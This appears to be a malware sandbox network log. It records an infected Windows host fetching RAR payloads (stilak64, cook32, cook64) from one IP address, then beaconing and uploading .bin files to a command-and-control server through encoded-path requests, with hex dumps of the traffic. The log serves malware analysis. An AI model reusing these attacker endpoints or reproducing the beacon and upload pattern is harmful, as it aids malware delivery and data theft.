Apr 22, 2022 16:17:41.408549070 CEST	7963	IN	Data Raw: f4 a5 43 2d 6c 81 69 15 7d c5 7c e3 32 37 20 a4 3e 07 9d 42 71 c2 ba a7 22 11 8b 17 3d 68 14 95 f1 f1 0c cc 86 85 af d8 a8 5d 2f 7b 4d cc ed cf e4 67 a8 f0 b5 68 e9 26 64 ba d7 46 09 e5 fd 70 a8 70 67 b1 52 9a 60 b2 5b d6 65 82 dd ad 8f e1 60 16 Data Ascii: C-li}\|27 >Bq"=h]/{Mgh&dFppgR`[e`y)z~ZZW6i`{}dSC'WT3U=Xg8j@<nO\PL&-\k,UtTTt??{k,IxuTLaNx240JoP
Apr 22, 2022 16:17:42.148870945 CEST	8312	OUT	GET /stilak64.rar HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 193.56.146.148 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:17:42.219147921 CEST	8313	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:17:42 GMT Content-Type: application/x-rar-compressed Content-Length: 482451 Last-Modified: Tue, 15 Feb 2022 12:21:38 GMT Connection: keep-alive ETag: "620b9ad2-75c93" Accept-Ranges: bytes Data Raw: 0d 75 7c 71 77 25 41 de ab 55 1e f7 96 9a 6c be f5 45 95 4d 32 9f 20 4a c7 75 c2 48 42 b2 9d 70 79 d1 c9 d2 8a a0 c4 98 cb 9c 62 cc 29 48 78 69 e2 4b 72 e8 76 04 55 11 7e dc a5 1c aa 27 c3 38 70 74 b5 77 f5 ff 26 86 e1 0f 94 12 25 51 f4 84 cd 6f 10 e4 b6 3c 40 51 b9 53 d2 22 e5 d3 07 cd 32 eb 3f 1b cd eb d4 99 0b 3a 82 60 ef 83 1c 01 45 59 a2 e7 de a0 50 e1 0d 1a e0 53 d9 8d 52 d9 f8 fd 0f a8 59 d9 cb 1b 4a 88 81 0d f5 58 25 6f fe 67 b8 c5 1d 52 63 70 21 42 a2 d5 d8 65 56 53 fc 44 e5 72 27 56 d3 64 c1 db 2b 5b 76 26 64 0c 0d 53 dc 67 1d 4d 09 d4 a0 b3 53 b8 24 f9 0a b2 87 24 05 8b 53 27 e7 f1 2c 84 a8 40 4e 26 63 54 cb 6f 9d 0f f3 33 b8 43 7f 1e 62 4d 96 36 7f ad d7 3e c7 53 b4 e8 a2 2e bb 0f 9c 3d 23 3a a7 c6 d0 55 03 cc 90 7c 87 31 85 73 13 76 ca 31 f5 9b ff 6d a5 61 b9 a3 8a a3 70 38 cd ff fc a5 66 21 c0 08 8d 27 be 35 3b f6 5c 96 3a 15 33 48 5d 38 e7 e2 60 d9 df 15 5e 38 07 0d b2 a6 bf 50 6a 84 33 1a e8 a6 da 86 e8 3f d7 e6 d7 24 76 eb 96 bb a5 cc 6f 82 b4 0e a3 79 5e c4 60 e6 b6 5a 03 73 f2 67 fe 2b 78 1a 50 d4 ac a0 35 79 ff 03 5a 49 99 4e 11 ce 75 a6 04 f1 6f 6b 3b b5 73 03 95 e2 ab e4 3b b5 74 1a 60 c5 2a ad e7 d7 5d b3 0a d9 11 d5 6c 27 56 52 63 47 d7 0b 2d 3a 0d 45 8d 8e 97 77 07 1e e5 d4 dc e1 88 fe f9 d2 74 7d 4f a7 04 b8 f3 ba fb 40 1f 49 e7 b5 06 6b 79 35 59 33 7e 88 43 79 f6 33 77 f8 c8 ef 58 18 8f 90 cc 03 b5 17 69 23 0a 85 4f b5 c4 01 9a e0 61 1f bc 73 d0 da 01 f1 c2 5d 73 03 99 68 63 02 11 cd 42 d7 a7 f9 20 9f 83 b6 c1 f1 6d dd e8 f0 68 04 65 de 14 85 03 c0 50 2d d5 45 6e 83 2c d8 34 26 52 0f d3 bd 70 5c 15 72 c0 2d 25 0e 70 34 46 b2 4d af a3 f5 ea fc 35 9f 7c 01 51 88 bd ea 0f ab 08 fd b4 f0 dd 4c 98 dc db db 94 5b ee 64 b9 a0 58 cb a9 c4 6a 3c fa e7 dd e0 c3 7e 0d 04 68 49 66 77 73 a7 81 63 0d b7 bd c5 2c 1d 8b e1 c4 9b db 9f bb ca 15 a2 e4 43 f9 13 60 0b 9a ad f7 28 5b 81 d1 7a 80 20 7e a2 0c d6 a0 bf 35 bb 3f 9d a7 04 30 12 cf 8a 06 c4 70 c8 63 b4 97 e4 ec e7 4c de 30 bc c6 6c b4 58 72 30 4a a9 6a dc 0d 62 51 0c 2e 6d 7e 49 a4 cb 04 60 4d f7 8c cd b7 1b 66 44 52 6d 9a e4 19 d6 ae ad 72 a4 7f 12 12 2a 4c 15 6e 1e 0f fa 7f 99 10 90 98 a0 1e 48 80 d7 0b b4 b5 bd a1 01 84 ab 4b 57 4c cd cc da 25 67 ce 38 f1 cb 56 2f 2f f2 0f c5 97 98 16 f7 e9 ae d3 ed a9 76 91 de 56 f9 43 bc c3 c2 c7 5b bb bb 68 69 d0 14 82 3f 10 a2 6e 6b 5f fa 85 97 2b a1 36 2a 1d c3 16 cb 60 da 79 c5 54 ad 23 d0 d1 7a 3d 77 d6 11 c2 99 d6 d4 1d 4f 4f a6 87 29 4a f4 4d 75 de 90 ef 07 21 95 ec b2 dd 47 c4 5a c9 94 5f 99 25 d4 29 8f d5 d4 9d f3 0a cf d3 ea 33 f1 e0 ad f5 2a 05 52 f9 f5 b9 b1 73 c4 5f da 48 15 9f f0 11 61 22 c7 ca ed 47 54 83 8a 99 5a 1d 5d 6a 26 ec a2 f4 93 b7 be 84 4a 9b 83 73 9c 88 8d a7 8a 64 0e 2f 0a e0 7c 51 07 72 bf 82 ee 91 ab 28 16 49 86 83 31 93 d1 b6 c9 85 8d 4c a7 0b 97 98 bb 12 a3 63 64 d1 ed bc 7d 1b f3 71 0a e1 84 d5 7d 30 40 57 1b df 64 50 82 a1 d9 4a d6 c2 01 a8 a9 4d a0 ab c5 b1 49 93 77 1c 5a 0d a8 b8 bf 21 5d 65 52 da 4d aa 2f cf 8e 02 88 c0 b3 1d b0 1c c7 bb b2 e9 50 67 88 8c 43 3a 7c 65 7c 56 da d7 83 e0 5e 2a ea 15 82 65 73 d3 a4 83 fd 66 90 28 2e 03 56 49 f7 43 49 38 d8 22 71 f5 1a 69 26 db 83 eb 1a 3f 4a ee 68 12 3a 9d 6c ed 14 dc 44 48 15 7d c2 f2 76 14 21 c5 cf a6 be ab bc 53 ec 6a a1 b4 e9 a3 09 5b c5 1b 52 cd 8d ed Data Ascii: u\|qw%AUlEM2 JuHBpyb)HxiKrvU~'8ptw&%Qo<@QS"2?:`EYPSRYJX%ogRcp!BeVSDr'Vd+[v&dSgMS$$S',@N&cTo3CbM6>S.=#:U\|1sv1map8f!'5;\:3H]8`^8Pj3?$voy^`Zsg+xP5yZINuok;s;t`]l'VRcG-:Ewt}O@Iky5Y3~Cy3wXi#Oas]shcB mheP-En,4&Rp\r-%p4FM5\|QL[dXj<~hIfwsc,C`([z ~5?0pcL0lXr0JjbQ.m~I`MfDRmrLnHKWL%g8V//vVC[hi?nk_+6`yT#z=wOO)JMu!GZ_%)3Rs_Ha"GTZ]j&Jsd/\|Qr(I1Lcd}q}0@WdPJMIwZ!]eRM/PgC:\|e\|V^*esf(.VICI8"qi&?Jh:lDH}v!Sj[R
Apr 22, 2022 16:17:42.488375902 CEST	8813	OUT	GET /cook32.rar HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 193.56.146.148 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:17:42.558615923 CEST	8814	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:17:42 GMT Content-Type: application/x-rar-compressed Content-Length: 340625 Last-Modified: Tue, 15 Feb 2022 12:21:38 GMT Connection: keep-alive ETag: "620b9ad2-53291" Accept-Ranges: bytes Data Raw: b0 de 4f 49 3e 24 d7 25 8f 5f 32 cb 68 d0 f4 93 af f0 7f 50 64 1d fb 9c 51 47 b4 37 b4 c3 b3 f2 09 f9 64 44 05 e5 ed 84 78 d9 45 a6 f9 2d 18 c3 cf 6e 2b 12 64 9a 4c e3 b3 28 28 c6 7e fa 75 e9 d5 b8 ca 31 2c fc 1e 5b 38 3d f6 a8 00 9e d8 56 2e 87 f0 ca 5f 13 24 2f fe 68 62 cb 7b 8d db 85 f6 9d fa a9 bf 40 fa 1e a9 c4 8f 71 5c c8 1f 81 04 38 86 d3 f0 39 bc f7 85 e6 02 f7 95 6a a5 ae 27 cf 8b a8 a6 b9 cf ef fa d1 af 6d 75 31 09 bb 24 60 ac 23 59 15 7d 44 9b 76 36 a2 df 3b 6c 5b 24 92 15 0c ff 95 d7 50 ba a0 12 cc c9 47 0e 76 8e e7 da e0 dc ca 3b 49 80 f7 0e 9d 68 61 e9 1c 11 f5 01 4b a9 4f 05 01 2e 31 b1 ef fe 0e d3 4e b6 e4 fe 0f 5a 09 af f6 a6 8f 1f b7 1a c0 7e 50 bd 6d e5 a4 4e 26 83 b0 56 49 41 1c bb e8 33 77 24 d2 b4 f4 c1 75 a9 3d 8a 0d 89 64 4c 63 74 5c 94 75 65 13 b4 d0 14 7f e2 69 3b dd 26 c0 e2 40 3d 2b a0 20 73 7e 22 23 ad 0b db 9a 49 8b be d0 c7 27 0b f3 32 3e b5 b9 ca 0b a0 da 5c ec 56 68 53 21 8d 7f d9 03 31 9d d3 59 b3 78 c3 b8 dd 6e 99 a7 27 86 e7 09 0a d8 b7 82 6e 4c 89 dc 0b b8 1d 9e 97 14 ac 3d 06 0d 26 ef a7 96 f1 ad 8a 76 77 64 1a 3a 59 3d fc c8 45 aa f1 d5 b3 09 83 43 f5 a0 d6 26 5d 99 28 a3 45 5d 52 3e f9 11 9e 6f 44 46 2a ac 45 da 09 1a dd 21 67 e5 40 b6 06 d0 cf 74 9b 94 c2 36 21 2a 71 53 d2 b9 c6 7a 42 6e 22 4f cd 27 b5 4a 92 0a 62 86 2f 08 70 20 09 0f 6b b2 04 e3 91 bb 1d c9 6b 9c 38 81 96 25 cd db 8f d1 7d 11 25 25 aa d8 c3 83 b4 41 57 5a f8 ef 1f 9c 3b 4c e3 6b 72 62 fd 3c 90 49 cc 83 28 5d d8 a9 9a 8e 37 2b bc 69 1c de dd fa 08 d4 7a b9 37 58 8b 0f e4 38 0a e6 f3 32 cc 84 d0 cd d6 59 87 94 0b 8e 64 b3 87 fc d7 d2 37 29 03 bb 2c 60 a3 0c 0f 18 86 67 23 2e e4 57 cf f0 eb 52 e3 dd fd 06 a4 c1 d7 38 ef f2 01 08 d7 06 44 e2 25 d8 d2 97 11 f0 ab 00 c4 4d 87 5e 5e 56 2a bf cb 83 48 0b 1f ef 22 c8 bb 25 80 56 f8 a5 dc b5 a5 b4 84 35 73 a8 f9 5d 72 3e cb 8c 92 be d0 ec 3b 0b e4 de ae ce 6e 4b 10 b9 25 b8 c2 0c e2 62 74 71 25 cb 3b 55 dc 0e dd ef 9f d3 54 22 f9 9a be 98 a4 df 39 2f e1 34 bc 49 0b 4e 03 d6 c7 ce 0b f1 e9 32 62 03 f0 30 28 22 b2 c0 ec eb 3e e7 a0 f2 2d c7 19 3e 76 b2 f7 a6 d5 2a 6c 98 c5 e4 a9 a1 d2 21 29 69 73 2b 1f 9e 39 76 f2 76 e5 ee 98 17 25 97 60 97 d5 c6 c4 78 54 48 15 3f ff 56 fd 03 eb 0c b3 66 d4 e7 4a 5b 82 60 b6 ba 8e 2d a8 96 f9 11 2b 44 ee 2c 9c b1 39 2d 40 94 ef c2 c6 5e 73 e9 59 e1 1d b1 e6 0e 6a 56 42 b4 58 55 d2 47 3b f6 9d 01 8e 93 a2 08 26 c6 e6 a8 a9 d2 f6 03 41 3e 81 be ec 83 f4 e7 08 39 a6 cb ce a7 bd 1d 86 97 f7 f7 f1 41 ff 3f a1 f0 7f 29 dd 7c 63 2c fd 74 4a c2 13 90 d4 2a 31 53 47 d2 5b 97 be b5 8e 58 89 8a e4 b7 a6 0d 78 5b 0b 60 ee 16 0a 49 78 e9 1f 00 e7 c8 e7 2e cd d9 fe 0e 29 ff c7 11 53 66 5d 24 1e 97 75 c0 35 f7 9f 25 18 66 b6 9c 72 44 8b 83 3f 8f 27 2b e8 1a 2b 12 1e ec b1 40 56 57 35 56 40 e3 d5 7d 62 62 c6 44 9e 12 70 f7 44 aa 86 81 fb ee f4 5e 1a 94 e6 16 a8 4f 96 bc 13 3a 6a d8 7c 97 44 cf de 43 cd 09 a4 93 19 d8 c8 99 8e 7a 14 51 37 f5 3d 5e 4e c4 92 54 c0 eb 96 2a 2d 01 45 c8 4c 08 4e d0 f4 48 ab c9 ca 09 b9 b7 4a d2 6e b0 e7 1e b6 04 67 e0 d6 b3 a9 78 38 b0 8a 30 88 bc 34 6a 23 a9 32 01 15 12 3d f8 28 8d d9 e3 63 e6 fa b1 6d ea 35 41 83 29 1a 76 46 a1 ee 54 db 81 2c 06 83 b5 71 ac 91 ea 7c f7 b1 d2 83 55 5b 61 a8 fd b5 57 4f db 3e 9f 77 e7 ad 16 79 5b 76 47 7b 62 8f d7 42 Data Ascii: OI>$%_2hPdQG7dDxE-n+dL((~u1,[8=V._$/hb{@q\89j'mu1$`#Y}Dv6;l[$PGv;IhaKO.1NZ~PmN&VIA3w$u=dLct\uei;&@=+ s~"#I'2>\VhS!1Yxn'nL=&vwd:Y=EC&](E]R>oDFE!g@t6!qSzBn"O'Jb/p kk8%}%%AWZ;Lkrb<I(]7+iz7X82Yd7),`g#.WR8D%M^^VH"%V5s]r>;nK%btq%;UT"9/4IN2b0(">->vl!)is+9vv%`xTH?VfJ[`-+D,9-@^sYjVBXUG;&A>9A?)\|c,tJ1SG[Xx[`Ix.)Sf]$u5%frD?'++@VW5V@}bbDpD^O:j\|DCzQ7=^NT-ELNHJngx804j#2=(cm5A)vFT,q\|U[aWO>wy[vG{bB
Apr 22, 2022 16:17:42.801275969 CEST	9170	OUT	GET /cook64.rar HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 193.56.146.148 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:17:42.871933937 CEST	9172	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:17:42 GMT Content-Type: application/x-rar-compressed Content-Length: 476823 Last-Modified: Tue, 15 Feb 2022 12:21:38 GMT Connection: keep-alive ETag: "620b9ad2-74697" Accept-Ranges: bytes Data Raw: 0f 75 82 13 fa 7a ea 53 67 fc 55 b7 af 7a a0 f8 ca 72 94 ed 3d c2 18 7b 32 79 22 25 18 da 5a 6c eb c6 21 cb 91 1b 33 b6 b8 99 ba db 25 f0 15 9b 17 fd 86 f4 4f 67 5e ce ed 8e b0 58 4b b3 85 43 64 49 db de 55 7c b0 24 cd a0 99 b6 c1 6b 30 f2 50 d8 2e 8d 85 ba d6 a9 39 eb 55 bb 28 b3 c0 30 57 a1 75 72 30 8e 91 0d 5c 8a 82 b3 bd ab ef 18 60 95 75 3e 16 c2 58 a2 f3 1c 82 f9 85 e7 5c 9e f9 48 f8 94 27 dd 56 01 3c b8 67 86 25 81 3a 69 6f bf 62 dd ed 25 b7 fb 1c 3d 14 8d ec c3 ed 6b 9b 34 d0 e6 57 be 48 6b d0 2d 1f 98 93 3a 8f cc d7 e3 a0 af 3e d0 98 be d2 b0 40 c1 e8 dc 28 67 29 37 fe c2 50 2b 78 da d2 a9 3c 5f ba c3 70 dc cb 6c 47 75 42 69 0e 56 da d0 3e 0f fa a9 99 c3 f3 b7 be 34 8a d5 70 fe cd 95 68 19 be 83 27 96 33 7f 6f ba d9 53 09 9c 98 35 2b 91 f2 3e 33 fa 75 6a 77 79 6e 73 90 63 da 2d f5 6e 22 a3 bd 0a cf bf f7 74 7a 3b 64 32 7c a5 29 f2 03 31 88 b8 96 a7 ae 5f dc ee ff 99 fb 52 57 9b ec cc 38 72 0d 99 38 54 da b4 35 c5 c2 98 28 d9 63 5e 2d 8c 7b 8c c5 d2 25 82 45 2d 8a 10 88 c7 82 53 71 2d 52 3b 89 b3 79 d7 ad 05 70 55 4c 9c b4 9b fd 4d 9a 54 82 33 03 f0 8a a8 fd cc c0 9c 22 94 c5 94 d1 9b b4 1f 94 55 17 df fa 13 ba 8c 59 fe 5e 57 3a dc de cf 05 02 56 c5 d3 17 91 ba 01 80 b2 c0 36 b6 6a 4b 4e cb 8e 25 23 45 33 00 56 32 52 4b 4b 37 b6 67 ca 21 68 98 e5 94 09 7a 02 66 72 d8 b8 85 ab 86 b9 38 c3 70 6a 66 97 bf 8b d9 e9 9b 37 7f 28 e4 c2 f7 95 58 8c 54 10 e4 36 d2 96 1b 45 32 34 25 dc 2a d3 0d 2f c0 cd b8 4c a7 a5 22 1c 24 9d 43 26 bd 70 0a 01 89 49 df 91 26 35 60 7d d4 32 d4 a5 fb bd fb b9 b2 20 c2 fc ae ae 5c c8 0a 3e af 27 8c 3a 6d e8 04 1c ac e6 64 28 53 ca f9 d1 2d dd 32 14 e3 30 bc f6 8a 6b b9 b9 4b 3a 8d 85 f8 82 11 d5 d7 8e 97 7a e7 cc c3 c3 f1 2c 8a 69 82 45 eb 11 73 52 d0 f9 0e 92 17 a7 d9 8a 74 db 21 5e 93 24 e3 a1 4a 82 ee 76 80 ae fd ed d1 4a f2 ec f1 3c cf 09 d3 2b e7 57 18 2f e2 11 bb c7 f1 2b 4e 3d 53 33 63 4e 74 16 ce 80 77 6f e5 a1 1b 66 8c 2b bb 4a e6 97 8d 67 e2 39 cd 15 2f 56 3f 38 41 4c b5 8d c3 b3 4c e5 22 86 03 d3 19 bc ad de 79 eb 98 a1 f2 bd 8d ec 45 5d 96 d4 80 bd 79 d3 c4 31 1f 03 fa 68 36 e9 e2 56 92 e9 92 7d 46 6e f9 c4 d6 48 7d 5f 5b 5b 2f 2b 52 1f e0 f8 62 82 36 06 84 6b 5f 3b eb 4e 45 cc 35 f5 bf 3e 3c d2 86 77 24 ee d0 4a 19 37 b4 33 e5 48 a5 ab 32 2c 24 85 4a 29 41 51 a5 a5 89 fc fd ba 42 19 9d 55 18 e1 67 18 cf 36 79 16 9e 5c 14 10 f9 bd e3 4f 74 e2 fd 12 b1 73 67 75 c7 1d 69 ef ce 5d ea 33 07 96 d5 32 6a 68 a0 d7 2c 90 ac 92 c8 c4 8c 58 20 33 06 a7 1f 8f 2a 3c 1a 81 61 48 bd c4 3f 6e ae e6 df d9 e9 94 5a 38 f3 2c 1b 71 74 85 c3 02 be 82 37 93 08 92 c3 38 42 08 9c 37 b1 8a 06 01 c5 ab f3 17 b0 f0 1f 59 6f 76 c3 4b 52 d6 a1 af 62 50 61 66 0e a4 fe 0f 0a 1e 70 50 cc 76 ce 5e 2a 6e 73 73 fa bb d5 01 ae 1f 59 3c 69 be 85 a3 a5 04 1e c6 47 6c 3a e7 17 a7 e6 db cf 4a ff 6e cb c6 50 18 c2 ab ec ae db 7b 60 78 0f cd a4 74 f8 e2 2a ff 5a 65 02 fb fe 64 34 83 b4 23 b1 43 94 7b a2 2a 2d f9 1d 09 70 8a 8e 99 80 52 60 0a 39 79 76 ea 65 51 2f 7f f5 fc f5 0a bf 09 27 3c fa a8 cf 17 aa de 88 dc 66 45 a6 35 cf e9 7d 81 09 ec 05 7f 27 e4 9b 57 a4 b2 f1 63 00 ba 60 b0 4b 09 33 d8 7a 2a b2 18 24 5a 89 e4 87 3e 49 f4 95 86 9b 05 a0 31 c4 2f 4f c4 c2 f8 85 7d 08 d4 87 38 a1 f2 0e fc d6 33 bf 14 28 20 3c f6 ea d2 5a b1 d9 4f a6 61 Data Ascii: uzSgUzr={2y"%Zl!3%Og^XKCdIU\|$k0P.9U(0Wur0\`u>X\H'V<g%:iob%=k4WHk-:>@(g)7P+x<_plGuBiV>4ph'3oS5+>3ujwynsc-n"tz;d2\|)1_RW8r8T5(c^-{%E-Sq-R;ypULMT3"UY^W:V6jKN%#E3V2RKK7g!hzfr8pjf7(XT6E24%/L"$C&pI&5`}2 \>':md(S-20kK:z,iEsRt!^$JvJ<+W/+N=S3cNtwof+Jg9/V?8ALL"yE]y1h6V}FnH}_[[/+Rb6k_;NE5><w$J73H2,$J)AQBUg6y\Otsgui]32jh,X 3<aH?nZ8,qt78B7YovKRbPafpPv^nssY<iGl:JnP{`xtZed4#C{-pR`9yveQ/'<fE5}'Wc`K3z$Z>I1/O}83( <ZOa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49844	67.43.234.14	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 22, 2022 16:17:43.570158958 CEST	9670	OUT	GET /images/AoDLtoSAe/6DutmjjyTDh_2FQIHiYd/9oUyw2I2q90tROkr2KR/CWUpolUDaN3tzGChr_2Fou/FHzHk9QUMrSRZ/edSCIB1B/azzWY7zElPFGbO93RGKzQEV/_2BFkKFxQ8/998NdOxMsC3fIYEdc/Ie4_2B_2Fdrx/UGzDt2NGXpg/BvRBjI35WivTtB/QL0X0ILari4KdxRWbrbAr/dqxmqcvrNDaF_2Bj/dg1F4yD3XCaAWKh/cjFMlT2T0Dm12MNjNP/5xwNUsaBN/B99UzFhpyEcfojrdPWgD/_2FdFku_2FhlwUSz/g.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 67.43.234.14 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:17:44.208116055 CEST	9670	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:17:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49846	67.43.234.14	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 22, 2022 16:17:54.570586920 CEST	9678	OUT	POST /images/vdoa2puIgygDcKHOof7W5Nx/Sm5x_2FLro/zObUXzRQyLPWX4K31/W76pZEGagBpT/o6IGunTWfCn/lXzKVuv3SgxDcg/QnnnzAZBFXh1ukr9Caozw/wPM7sTqNdf9sx_2F/Rne6TvIOz1EJrXu/g31KyfFRkwWQ7yEqN4/zXMBf0AoC/FcsOEsPhqIXCKsCLKvy2/p_2BCCsPTnYHLO5apYZ/ZOWl4UxrQhGJIiW3n82a5o/LRy86Sxl6Pzdu/NQ1r9_2F/M2tmRTakUsCXcEs_2FmAAzP/G6Sk1Uhj8yi4/tFtBd.bmp HTTP/1.1 Content-Type: multipart/form-data; boundary=11596931742640080004178997978 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 67.43.234.14 Content-Length: 56433 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:17:54.570643902 CEST	9690	OUT	Data Raw: 2d 2d 31 31 35 39 36 39 33 31 37 34 32 36 34 30 30 38 30 30 30 34 31 37 38 39 39 37 39 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 Data Ascii: --11596931742640080004178997978Content-Disposition: form-data; name="upload_file"; filename="2DBE.bin"#{1Fho.9=XN$em4G8}a);eoA96g~#`}@}9d$.PSJ&w
Apr 22, 2022 16:17:54.679055929 CEST	9691	OUT	Data Raw: f4 61 2d a4 3c ed 3a 61 de bf d8 14 0d 63 39 bb ce 4e 6d d4 e2 4c d7 d9 02 72 1b c8 7e bf 4e 51 06 96 2f b4 e7 86 bf 69 a8 34 20 ed e6 ef 72 26 e7 20 ab df 66 b8 57 de 27 b4 13 6e c9 aa b5 d0 fd 6c 57 a0 51 aa 56 66 a0 1b 2b dc db da 71 17 6d 37 Data Ascii: a-<:ac9NmLr~NQ/i4 r& fW'nlWQVf+qm7Xqs\Y <2pFP]LO6;25\R?nWT{]3+_j)lV,KYZ\#vR_Gkt,2yx(6[i.EMJ#5d@Fa
Apr 22, 2022 16:17:54.682475090 CEST	9712	OUT	Data Raw: 6c 92 b9 77 0d c0 4a 60 7c f7 61 92 a1 aa 72 08 3d 70 c1 52 fe 0a 9e e2 82 3f 3a 9f 1f 3e f0 2e 89 69 c9 dd ee 36 3c 23 52 7a 3a 56 cf 4f c5 d5 6c 2c 11 1d 2e 91 29 71 9b 78 4d d5 af 8e 4f 31 0c bc d0 27 09 8d 11 8f 00 41 bf f9 7a 52 9c 38 3f 13 Data Ascii: lwJ`\|ar=pR?:>.i6<#Rz:VOl,.)qxMO1'AzR8?-u)fW(K08E r\|fgjtkJbxD~:T2Y>cWI&0Na4rA`_0=IR8*PP)5wIP>=\d=:r}<`W:rA
Apr 22, 2022 16:17:54.683027029 CEST	9715	OUT	Data Raw: e6 56 8c 60 36 c6 4b 46 4e 55 39 d5 cd 3f 5f 14 f2 54 07 d1 54 b4 9e 80 6e e3 9d 22 3b 5e d3 ea 1d 08 ca 59 25 39 b3 82 41 05 72 26 c4 8c 25 ed 49 a1 ba f1 68 a5 ba 1b 25 e4 70 c8 51 e9 39 0c 49 de 17 52 5b ce 73 bb 89 86 0f 31 37 86 44 3f ee 84 Data Ascii: V`6KFNU9?_TTn";^Y%9Ar&%Ih%pQ9IR[s17D?&etFIaQOm5_sE'6s8[ExIm} 2'gs#vY@mp6c*wEH&k4z3Da4YS3\XHX9Cyh6+QzVTluTqE
Apr 22, 2022 16:17:54.787646055 CEST	9718	OUT	Data Raw: 05 46 00 e0 72 6c f5 60 8c 78 ed 53 57 ce 89 a0 14 1b 6e 40 e4 6c 4b 33 59 d0 c3 88 78 33 e2 e9 99 a0 6b 60 4d de e8 80 21 33 b9 1e 72 7a 13 95 96 ae 27 4f b6 21 a4 a2 67 ad 26 f6 f9 b5 60 5f af 8c 0b c0 28 59 d0 39 87 58 67 65 7e 75 62 19 cc 76 Data Ascii: Frl`xSWn@lK3Yx3k`M!3rz'O!g&`_(Y9Xge~ubvCHMUv_\O;x'-LJ{G=T&\7GeorT(4\y_/~!m-?*@;-c T3z::'eQn,dh
Apr 22, 2022 16:17:54.801800966 CEST	9734	OUT	Data Raw: 54 4e 40 04 c3 fa fe 3b 77 24 69 ad 51 83 12 56 63 f0 46 52 31 ea f6 0c 97 87 a8 5b 4c 8a 94 00 5c 73 fd 08 ca 76 96 dc c6 ae 62 d1 1b c2 0c 4b 53 64 77 81 f1 5d 1b 04 f2 42 ee 5b 7f 80 fc 8c a4 2c b9 0b fe db 9b 65 4b a8 95 83 65 20 39 4a 49 e7 Data Ascii: TN@;w$iQVcFR1[L\svbKSdw]B[,eKe 9JIIv_{QH.,+zFL:?3Dx/v0>m38Rl33pMOCrCMjIpq W2,V1edEFMpa,lBxE=#/h&GVUz
Apr 22, 2022 16:17:55.727977991 CEST	9734	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:17:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Apr 22, 2022 16:17:55.825753927 CEST	9735	OUT	POST /images/exH_2BV5hI6UV32xq/9iKc6ZjImWoQ/GIugApItTP6/eU0FsndbiatJlG/8sZ81QZwXTfmteOvaRx3j/YoZ9Z9WZVb88loFE/XwzEGCF_2FYd014/RsM17SCy13qQU2pAif/TMyGZBQvh/N26WrESLVWVbmtD7LEn9/Rx20gFSw1JZAg58DLOG/BJUKRsQbaNOa0owKYxus_2/BoGrwh_2BDKqm/DuvxAvK6/zywXiP_2Bz0bAUH1Ay0X5pY/Ej1B6Nr9jL/cJXSt0eQu6DGGZWaR/qgLa8p54JO9D/mFJ_2BIO/ix2MS.bmp HTTP/1.1 Content-Type: multipart/form-data; boundary=10237571242640080004192591583 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 67.43.234.14 Content-Length: 385 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 30 32 33 37 35 37 31 32 34 32 36 34 30 30 38 30 30 30 34 31 39 32 35 39 31 35 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 37 42 43 33 2e 62 69 6e 22 0d 0a 0d 0a bd b0 f1 b6 42 83 6d 65 20 17 b7 fb 0d 60 e3 e2 8e a3 3d 4a a0 8f 53 32 cd a5 0d 3f d7 08 bf cf f4 c9 84 46 e2 bc 84 12 c0 c3 eb 2a e5 03 39 f0 51 30 6f 08 25 1f 0d 8c 35 e7 bf fd 2b a4 34 e4 a3 3f 1b a5 e0 ad 70 da d9 18 0c e9 08 df 88 03 7f 14 91 6e 2c 69 c2 3b 07 ce 1b 3c d4 9b 0b d9 d7 31 57 2d 0a cc c1 c3 8c 59 fd e9 25 83 65 d5 1a 69 75 ca 41 3a 04 b8 d7 d6 e1 b9 70 4c 46 1b 1c 38 1c a5 12 4b 46 bf e1 55 f7 c8 ef dc d0 f1 67 44 ca b3 44 9d 69 62 8b 5c 75 ec 35 e6 3c cf 38 8f be 4b 6b e5 e6 5d 26 9d f3 ce 48 68 4e b1 b8 6a 45 18 72 2f 38 c9 